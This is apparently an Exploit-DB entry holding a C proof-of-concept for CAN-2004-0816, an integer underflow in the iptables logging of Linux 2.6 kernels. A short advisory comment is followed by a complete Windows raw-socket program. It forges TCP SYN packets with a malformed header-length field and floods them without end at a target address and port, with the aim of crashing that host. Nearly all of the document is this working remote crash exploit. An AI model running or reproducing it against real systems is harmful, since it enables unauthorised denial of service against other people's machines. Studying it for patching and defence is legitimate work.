Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
/* source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker may exploit this vulnerability to crash a computer that is running the affected kernel. The 2.6 Linux kernel is reported prone to this vulnerability, the 2.4 kernel is not reported to be vulnerable. */ /* * * iptables.log.integer.underflow.POC.c * * (CAN-2004-0816, BID11488, SUSE-SA:2004:037) * * felix__zhou _at_ hotmail _dot_ com * * */ #include <stdio.h> #include <winsock2.h> #include <ws2tcpip.h> #include <time.h> #pragma comment(lib,"ws2_32") static unsigned char dip[4]; static unsigned int da; static unsigned short dp; static unsigned char dport[2]; static unsigned char sip[4]; static unsigned int sa; static unsigned short sp; static unsigned char sport[2]; /* static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum) { unsigned int csum = 0; unsigned char *p = ip; while (1 < size) { csum += (p[0] << 8) + p[1]; p += 2; size -= 2; } if (size) csum += *p; csum = (csum >> 16) + (csum & 0xffff); csum += (csum >> 16); sum[0] = (((unsigned short)(~csum)) >> 8); sum[1] = ((((unsigned short)(~csum)) << 8) >> 8); } */ static void tcp_csum(unsigned char *tcp, unsigned char *ip, unsigned int size, unsigned char *sum) { unsigned int csum = 0; unsigned char *p = tcp; while (1 < size) { csum += (p[0] << 8) + p[1]; p += 2; size -= 2; } csum += (ip[12] << 8) + ip[13]; csum += (ip[14] << 8) + ip[15]; csum += (ip[16] << 8) + ip[17]; csum += (ip[18] << 8) + ip[19]; csum += 0x06; csum += 0x14; if (size) csum += *p; csum = (csum >> 16) + (csum & 0xffff); csum += (csum >> 16); sum[0] = (((unsigned short)(~csum)) >> 8); sum[1] = ((((unsigned short)(~csum)) << 8) >> 8); } static int work(SOCKET s) { DWORD ret = 1; unsigned char buf[1500]; unsigned char *ip; unsigned char *tcp; unsigned int seq = 0x01; struct sockaddr_in host; ZeroMemory(buf, 1500); ip = buf; tcp = buf + 20; ip[0] = 0x45; /* ver & hlen */ ip[3] = 0x28; /* tlen */ ip[8] = 0x80; /* ttl */ ip[9] = 0x06; /* protocol */ ip[10] = ip[11] = 0; ip[12] = sip[0]; /* saddr */ ip[13] = sip[1]; ip[14] = sip[2]; ip[15] = sip[3]; ip[16] = dip[0]; /* daddr */ ip[17] = dip[1]; ip[18] = dip[2]; ip[19] = dip[3]; tcp[0] = sport[0]; tcp[1] = sport[1]; tcp[2] = dport[0]; /* dport */ tcp[3] = dport[1]; tcp[12] = 0x40; /* hlen */ /* HERE */ tcp[13] = 0x02; /* flags */ ZeroMemory(&host, sizeof(struct sockaddr_in)); host.sin_family = AF_INET; host.sin_port = dp; host.sin_addr.s_addr = da; for (;; ) { tcp[4] = (seq >> 24); /* seq number */ tcp[5] = ((seq << 8) >> 24); tcp[6] = ((seq << 16) >> 24); tcp[7] = ((seq << 24) >> 24); tcp[16] = tcp[17] = 0; seq ++; tcp_csum(tcp, ip, 0x14, tcp + 16); if (SOCKET_ERROR == sendto(s, buf, 0x28, 0, (SOCKADDR *)&(host), sizeof host)) { if (WSAEACCES != WSAGetLastError()) { printf("sendto() failed: %d\n", WSAGetLastError()); ret = 1; } else { printf("You must be Administrator!\n"); } break; } } return ret; } static char usage[] = "Usage: %s dip dport sip sport\n"; int main(int argc, char **argv) { WORD ver = MAKEWORD(2, 2); WSADATA data; unsigned char *p; SOCKET s; int ret = 1; BOOL eopt = TRUE; if (5 != argc) { printf(usage, argv[0]); goto out; } if (INADDR_NONE == (da = inet_addr(argv[1]))) { printf("dest ip address is NOT valid!\n"); printf(usage, argv[0]); goto out; } p = (unsigned char *)&da; dip[0] = p[0]; dip[1] = p[1]; dip[2] = p[2]; dip[3] = p[3]; dp = atoi(argv[2]); dport[0] = ((dp << 16) >> 24); dport[1] = ((dp << 24) >> 24); if (INADDR_NONE == (sa = inet_addr(argv[3]))) { printf("source ip address is NOT valid!\n"); printf(usage, argv[3]); goto out; } p = (unsigned char *)&sa; sip[0] = p[0]; sip[1] = p[1]; sip[2] = p[2]; sip[3] = p[3]; sp = atoi(argv[4]); sport[0] = ((sp << 16) >> 24); sport[1] = ((sp << 24) >> 24); srand((unsigned int)time(0)); if (WSAStartup(ver, &data)) { printf("WSAStartup() failed\n"); goto out; } if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0))) goto err; if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&eopt, sizeof(eopt))) goto err1; work(s); err1: closesocket(s); err: WSACleanup(); out: return ret; }
